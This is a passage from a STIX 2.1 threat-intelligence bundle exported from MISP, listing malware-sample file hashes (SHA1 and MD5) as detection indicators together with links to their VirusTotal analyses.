"url--58db804a-7c40-49de-b982-4d0102de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db804a-7c40-49de-b982-4d0102de0b81",
|
|
"value": "https://www.virustotal.com/file/023f81fd3a34ef94c9fd6928304426929672d4c7e9c98e60b631cbd2e2a56731/analysis/1450510322/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db804b-4ae4-49f5-9184-436f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:15.000Z",
|
|
"modified": "2017-03-29T09:37:15.000Z",
|
|
"description": "sample - Xchecked via VT: 14ff515a168fb6649f58c4a9d86531b151187df3bfdd1589cbc9804d3a1ec7c9",
|
|
"pattern": "[file:hashes.SHA1 = 'f1153631440d1462a84be9dd4b27358ceb162c1e']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:15Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db804c-6204-4766-a767-4d0102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:16.000Z",
|
|
"modified": "2017-03-29T09:37:16.000Z",
|
|
"description": "sample - Xchecked via VT: 14ff515a168fb6649f58c4a9d86531b151187df3bfdd1589cbc9804d3a1ec7c9",
|
|
"pattern": "[file:hashes.MD5 = '7000d3951d5eca9704f3d8cc11dd19ba']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:16Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db804d-e36c-4b16-b85b-4bce02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:17.000Z",
|
|
"modified": "2017-03-29T09:37:17.000Z",
|
|
"first_observed": "2017-03-29T09:37:17Z",
|
|
"last_observed": "2017-03-29T09:37:17Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db804d-e36c-4b16-b85b-4bce02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db804d-e36c-4b16-b85b-4bce02de0b81",
|
|
"value": "https://www.virustotal.com/file/14ff515a168fb6649f58c4a9d86531b151187df3bfdd1589cbc9804d3a1ec7c9/analysis/1409563704/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db804e-055c-46c1-b59e-48ac02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:18.000Z",
|
|
"modified": "2017-03-29T09:37:18.000Z",
|
|
"description": "sample - Xchecked via VT: d9ee7be833f760311805e92c7b9c448d2c609f258997038383cb337d8183fe71",
|
|
"pattern": "[file:hashes.SHA1 = '1d8152e59c62eaca0e77f2089507c5a861c81da2']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:18Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db804f-f8f4-4b1d-af50-4ed702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:19.000Z",
|
|
"modified": "2017-03-29T09:37:19.000Z",
|
|
"description": "sample - Xchecked via VT: d9ee7be833f760311805e92c7b9c448d2c609f258997038383cb337d8183fe71",
|
|
"pattern": "[file:hashes.MD5 = '72737f6159b3344b68ce92560da4eb63']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:19Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8050-1f74-43d4-b43f-4a6e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:20.000Z",
|
|
"modified": "2017-03-29T09:37:20.000Z",
|
|
"first_observed": "2017-03-29T09:37:20Z",
|
|
"last_observed": "2017-03-29T09:37:20Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8050-1f74-43d4-b43f-4a6e02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8050-1f74-43d4-b43f-4a6e02de0b81",
|
|
"value": "https://www.virustotal.com/file/d9ee7be833f760311805e92c7b9c448d2c609f258997038383cb337d8183fe71/analysis/1450609433/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8051-d618-4356-8ace-459002de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:21.000Z",
|
|
"modified": "2017-03-29T09:37:21.000Z",
|
|
"description": "sample - Xchecked via VT: 66cbe12b2b6e8869bc5399f96aa73ebc949de0530030f358cca48077aae0b294",
|
|
"pattern": "[file:hashes.SHA1 = '77c7e7f0e769478a03d3fdd7c565e60cdb5662a7']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:21Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8052-8f90-436a-a77e-487302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:22.000Z",
|
|
"modified": "2017-03-29T09:37:22.000Z",
|
|
"description": "sample - Xchecked via VT: 66cbe12b2b6e8869bc5399f96aa73ebc949de0530030f358cca48077aae0b294",
|
|
"pattern": "[file:hashes.MD5 = '5bdce1798a31215235cafb68c5a15c52']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:22Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8053-af90-4cbf-baaf-4c8902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:23.000Z",
|
|
"modified": "2017-03-29T09:37:23.000Z",
|
|
"first_observed": "2017-03-29T09:37:23Z",
|
|
"last_observed": "2017-03-29T09:37:23Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8053-af90-4cbf-baaf-4c8902de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8053-af90-4cbf-baaf-4c8902de0b81",
|
|
"value": "https://www.virustotal.com/file/66cbe12b2b6e8869bc5399f96aa73ebc949de0530030f358cca48077aae0b294/analysis/1415351077/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8054-42a8-4796-9acb-477e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:24.000Z",
|
|
"modified": "2017-03-29T09:37:24.000Z",
|
|
"description": "sample - Xchecked via VT: d2b523a861ecaa02e3ea0ea542087a09ea640ed36bc2c9cba311e91c7b01ecd0",
|
|
"pattern": "[file:hashes.SHA1 = '49ccf87726e3d3882c04ec18d003104a6c137d72']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:24Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8055-8fa4-4d4b-aa43-4d7e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:25.000Z",
|
|
"modified": "2017-03-29T09:37:25.000Z",
|
|
"description": "sample - Xchecked via VT: d2b523a861ecaa02e3ea0ea542087a09ea640ed36bc2c9cba311e91c7b01ecd0",
|
|
"pattern": "[file:hashes.MD5 = '9147307b6bb3d40fbb8b88ff2cfc22f9']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:25Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8056-8934-402b-be39-49d502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:26.000Z",
|
|
"modified": "2017-03-29T09:37:26.000Z",
|
|
"first_observed": "2017-03-29T09:37:26Z",
|
|
"last_observed": "2017-03-29T09:37:26Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8056-8934-402b-be39-49d502de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8056-8934-402b-be39-49d502de0b81",
|
|
"value": "https://www.virustotal.com/file/d2b523a861ecaa02e3ea0ea542087a09ea640ed36bc2c9cba311e91c7b01ecd0/analysis/1445912923/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8057-4960-4017-ba90-4c4502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:27.000Z",
|
|
"modified": "2017-03-29T09:37:27.000Z",
|
|
"description": "sample - Xchecked via VT: ec341985ced6f2a6001e8b17491682cb69fefc417a90ae2773bc2de4fd6b705c",
|
|
"pattern": "[file:hashes.SHA1 = '79ca827540c648205c3abadb68dd52e600ae3c8c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:27Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8058-4cac-480f-9b9f-4a5902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:28.000Z",
|
|
"modified": "2017-03-29T09:37:28.000Z",
|
|
"description": "sample - Xchecked via VT: ec341985ced6f2a6001e8b17491682cb69fefc417a90ae2773bc2de4fd6b705c",
|
|
"pattern": "[file:hashes.MD5 = '8e382c9781d197ac796ca33b51d8db4f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:28Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8059-1db8-438c-81db-473c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:29.000Z",
|
|
"modified": "2017-03-29T09:37:29.000Z",
|
|
"first_observed": "2017-03-29T09:37:29Z",
|
|
"last_observed": "2017-03-29T09:37:29Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8059-1db8-438c-81db-473c02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8059-1db8-438c-81db-473c02de0b81",
|
|
"value": "https://www.virustotal.com/file/ec341985ced6f2a6001e8b17491682cb69fefc417a90ae2773bc2de4fd6b705c/analysis/1422368778/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db805a-2688-407b-a882-4eca02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:30.000Z",
|
|
"modified": "2017-03-29T09:37:30.000Z",
|
|
"description": "sample - Xchecked via VT: 78d88775a781cb31e00dba41d7bb1f67a0928b2dc1b4ab6a0d26f038f894f175",
|
|
"pattern": "[file:hashes.SHA1 = '9636f08091641d05aaa84c636bbac2b3cbf501bd']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:30Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db805b-7640-41e4-9b97-485b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:31.000Z",
|
|
"modified": "2017-03-29T09:37:31.000Z",
|
|
"description": "sample - Xchecked via VT: 78d88775a781cb31e00dba41d7bb1f67a0928b2dc1b4ab6a0d26f038f894f175",
|
|
"pattern": "[file:hashes.MD5 = 'c19bce6c606a75cb80ec9d1e9b4f3c9f']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:31Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db805c-e590-4161-8cfd-492d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:32.000Z",
|
|
"modified": "2017-03-29T09:37:32.000Z",
|
|
"first_observed": "2017-03-29T09:37:32Z",
|
|
"last_observed": "2017-03-29T09:37:32Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db805c-e590-4161-8cfd-492d02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db805c-e590-4161-8cfd-492d02de0b81",
|
|
"value": "https://www.virustotal.com/file/78d88775a781cb31e00dba41d7bb1f67a0928b2dc1b4ab6a0d26f038f894f175/analysis/1472795442/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db805d-4a54-4444-903f-4dbd02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:33.000Z",
|
|
"modified": "2017-03-29T09:37:33.000Z",
|
|
"description": "sample - Xchecked via VT: 103e8aa2363344bdbda105d471a6086d2fd4ca87bd71509c0704a096c13da70c",
|
|
"pattern": "[file:hashes.SHA1 = '11b97b8ecd91e354a694ce115273ab75dcd6861d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:33Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db805e-8acc-49b8-ac2c-442e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:34.000Z",
|
|
"modified": "2017-03-29T09:37:34.000Z",
|
|
"description": "sample - Xchecked via VT: 103e8aa2363344bdbda105d471a6086d2fd4ca87bd71509c0704a096c13da70c",
|
|
"pattern": "[file:hashes.MD5 = 'c5458e51ed0f79e8117f6bc60bac1cba']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:34Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db805f-6034-47e0-8da4-400a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:35.000Z",
|
|
"modified": "2017-03-29T09:37:35.000Z",
|
|
"first_observed": "2017-03-29T09:37:35Z",
|
|
"last_observed": "2017-03-29T09:37:35Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db805f-6034-47e0-8da4-400a02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db805f-6034-47e0-8da4-400a02de0b81",
|
|
"value": "https://www.virustotal.com/file/103e8aa2363344bdbda105d471a6086d2fd4ca87bd71509c0704a096c13da70c/analysis/1422378362/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8060-2954-4336-b695-4f0d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:36.000Z",
|
|
"modified": "2017-03-29T09:37:36.000Z",
|
|
"description": "sample - Xchecked via VT: 69c22ca5a0814c285769a05f93235161b24360d02cf24c9527a0eef8becc3886",
|
|
"pattern": "[file:hashes.SHA1 = '716c92db65fb8661ad5694478feef10123f28d82']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:36Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8061-431c-4a21-a2a5-467602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:37.000Z",
|
|
"modified": "2017-03-29T09:37:37.000Z",
|
|
"description": "sample - Xchecked via VT: 69c22ca5a0814c285769a05f93235161b24360d02cf24c9527a0eef8becc3886",
|
|
"pattern": "[file:hashes.MD5 = '3ca602a360813b0a688cc2d1adc039d2']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:37Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8062-5714-42ce-af46-4b1e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:38.000Z",
|
|
"modified": "2017-03-29T09:37:38.000Z",
|
|
"first_observed": "2017-03-29T09:37:38Z",
|
|
"last_observed": "2017-03-29T09:37:38Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8062-5714-42ce-af46-4b1e02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8062-5714-42ce-af46-4b1e02de0b81",
|
|
"value": "https://www.virustotal.com/file/69c22ca5a0814c285769a05f93235161b24360d02cf24c9527a0eef8becc3886/analysis/1431378970/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8063-8cdc-4721-977c-44d202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:39.000Z",
|
|
"modified": "2017-03-29T09:37:39.000Z",
|
|
"description": "sample - Xchecked via VT: 1123b618043e9578eb6a50a5ee41bae55c23126448a100cdcfdae255a4f7d408",
|
|
"pattern": "[file:hashes.SHA1 = '73fd54103afb177e78ce73f13f9c552c40cf4451']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:39Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8064-8424-4925-b3ee-458902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:40.000Z",
|
|
"modified": "2017-03-29T09:37:40.000Z",
|
|
"description": "sample - Xchecked via VT: 1123b618043e9578eb6a50a5ee41bae55c23126448a100cdcfdae255a4f7d408",
|
|
"pattern": "[file:hashes.MD5 = '61a0575fee6afed6c0b2b585dfbedd6a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:40Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8065-5e3c-4a1b-9435-41d402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:41.000Z",
|
|
"modified": "2017-03-29T09:37:41.000Z",
|
|
"first_observed": "2017-03-29T09:37:41Z",
|
|
"last_observed": "2017-03-29T09:37:41Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8065-5e3c-4a1b-9435-41d402de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8065-5e3c-4a1b-9435-41d402de0b81",
|
|
"value": "https://www.virustotal.com/file/1123b618043e9578eb6a50a5ee41bae55c23126448a100cdcfdae255a4f7d408/analysis/1445871206/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8066-55bc-48eb-82d1-47d102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:42.000Z",
|
|
"modified": "2017-03-29T09:37:42.000Z",
|
|
"description": "sample - Xchecked via VT: 215e742c07a0675d309855caf0a5b0560ef679e12b9f15c8ab2a22706bd6353a",
|
|
"pattern": "[file:hashes.SHA1 = '866c271a335fa68db01100f76b6e297dde78077a']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:42Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8066-7020-4104-a9a5-4dde02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:42.000Z",
|
|
"modified": "2017-03-29T09:37:42.000Z",
|
|
"description": "sample - Xchecked via VT: 215e742c07a0675d309855caf0a5b0560ef679e12b9f15c8ab2a22706bd6353a",
|
|
"pattern": "[file:hashes.MD5 = 'c48785c83159fa72aee095fd8a5f391d']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:37:42Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8067-fbf4-4c8a-92e8-4c7802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:37:43.000Z",
|
|
"modified": "2017-03-29T09:37:43.000Z",
|
|
"first_observed": "2017-03-29T09:37:43Z",
|
|
"last_observed": "2017-03-29T09:37:43Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8067-fbf4-4c8a-92e8-4c7802de0b81"
|
|
],
|
|
"labels": [
|
|
